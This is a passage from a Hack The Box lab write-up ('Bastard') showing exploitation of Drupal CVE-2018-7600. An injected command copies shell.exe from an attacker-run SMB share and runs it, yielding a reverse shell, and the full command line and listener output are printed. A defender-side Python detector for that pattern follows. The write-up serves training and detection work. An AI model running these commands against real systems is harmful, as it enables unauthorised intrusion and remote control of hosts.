Exploitation


The target web application is vulnerable to CVE-2018-7600. The Python script below will be used to exploit the target web server and inject OS commands that upload and execute the payload over SMB.

┌──(kali㉿kali)-[~/archive/htb/labs/bastard]
└─$ simplesmb . -smb2support           
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Config file parsed
[*] callback added for uuid 4b324fc8-1670-01d3-1278-5a47bf6ee188 v:3.0
[*] callback added for uuid 6bffd098-a112-3610-9833-46c3f87e345a v:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Starting an SMB server (Impacket) on Kali to serve the payload

┌──(kali㉿kali)-[~/…/htb/labs/bastard/CVE-2018-7600]
└─$ python3 drupa7-cve-2018-7600.py http://$IP/ -c "copy \\\\10.10.14.6\\smb\\shell.exe && shell.exe"
 
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================
 
[*] Poisoning a form and including it in cache.
[*] poisoned form id: form-djieVAKKJ-x3gxAubHWb9P4LAVLVr6ZmUhF9Uh-rfzQ
[*] triggering exploit to execute: copy \\10.10.14.6\smb\shell.exe && shell.exe

Executing the Python exploit script

The target host connected to the SMB server and downloaded the payload. The payload is then executed, returning a reverse shell to the listener.

┌──(kali㉿kali)-[~/archive/htb/labs/bastard]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.9] 49172
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
ps c:\inetpub\drupal-7.54> whoami
nt authority\iusr
ps c:\inetpub\drupal-7.54> hostname
Bastard
ps c:\inetpub\drupal-7.54> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 10.10.10.9
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2
 
tunnel adapter isatap.{56fec108-3f71-4327-bf45-2b4ee355cd0f}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : 
 
tunnel adapter local area connection* 9:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : 

Initial foothold established as nt authority\iusr by exploiting CVE-2018-7600 on the target web application
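The chain above (the IIS anonymous account copying a binary from an off-subnet UNC path over SMB and then running it) leaves a distinctive trace on the host. As an added defender-side example, not part of the original writeup, the Python below scans constructed process-creation and network events for exactly that pattern: a web service account referencing a UNC path outside the local subnet, and an outbound TCP/445 connection to a host outside that subnet. The key=value log format, the field names, the 10.10.10.50 file server and the bastard\admin account are assumptions; the subnet, the attacker address and the iusr account come from the session shown above.

```python
import ipaddress
import re

# Local subnet as shown by ipconfig in the session above (10.10.10.9 / 255.255.255.0).
LOCAL_NET = ipaddress.ip_network("10.10.10.0/24")

# Account under which IIS handles anonymous requests; the shell above lands as
# nt authority\iusr, so a UNC fetch by this account is anomalous.
WEB_ACCOUNTS = {r"nt authority\iusr"}

# Matches a UNC path such as \\10.10.14.6\smb\shell.exe anywhere in a command line.
UNC_RE = re.compile(r"\\\\([\w.\-]+)\\[\w.$\-\\]+")
# Splits "key=value key=value ..." where values may contain spaces (assumed log format).
KV_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")

# Constructed sample telemetry modelled on the session above (not real log data).
SAMPLE_EVENTS = [
    # benign: an administrator copying from a file server on the local subnet
    r"type=process host=BASTARD user=bastard\admin image=cmd.exe cmdline=cmd.exe /c copy \\10.10.10.50\share\report.docx c:\temp",
    # web-facing account pulling an executable from an off-subnet UNC path, then running it
    r"type=process host=BASTARD user=nt authority\iusr image=cmd.exe cmdline=cmd.exe /c copy \\10.10.14.6\smb\shell.exe && shell.exe",
    # matching outbound SMB connection from the web server to that off-subnet host
    r"type=network host=BASTARD user=nt authority\iusr dst=10.10.14.6 dport=445",
    # benign: SMB to the file server on the local subnet
    r"type=network host=BASTARD user=bastard\admin dst=10.10.10.50 dport=445",
]


def parse_event(line):
    """Parse one key=value log line into a dict."""
    return {k: v for k, v in KV_RE.findall(line)}


def is_off_subnet(host):
    """True when host is an IP outside LOCAL_NET; unresolvable names are flagged for review."""
    try:
        return ipaddress.ip_address(host) not in LOCAL_NET
    except ValueError:
        return True


def check_event(ev):
    """Return a list of (rule, detail) findings for one parsed event."""
    findings = []
    if ev.get("type") == "process" and ev.get("user", "").lower() in WEB_ACCOUNTS:
        # A web service account should never stage files from a remote share.
        for m in UNC_RE.finditer(ev.get("cmdline", "")):
            if is_off_subnet(m.group(1)):
                findings.append(("web_account_offsubnet_unc", m.group(0)))
    if (ev.get("type") == "network" and ev.get("dport") == "445"
            and is_off_subnet(ev.get("dst", ""))):
        # Outbound SMB from a web server to a non-local host is the network side of the same chain.
        findings.append(("outbound_smb_offsubnet", f"{ev.get('dst')}:445"))
    return findings


def scan(lines):
    """Scan raw log lines; return (rule, host, user, detail) tuples for every hit."""
    results = []
    for line in lines:
        ev = parse_event(line)
        for rule, detail in check_event(ev):
            results.append((rule, ev.get("host"), ev.get("user"), detail))
    return results


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print("ALERT", *hit)
```

Running the block prints two alerts for the constructed input (the UNC copy by nt authority\iusr and the outbound SMB connection to 10.10.14.6) and nothing for the two benign events; the same two rules correlate on host and user, which is how a SOC would tie the process event to its network counterpart.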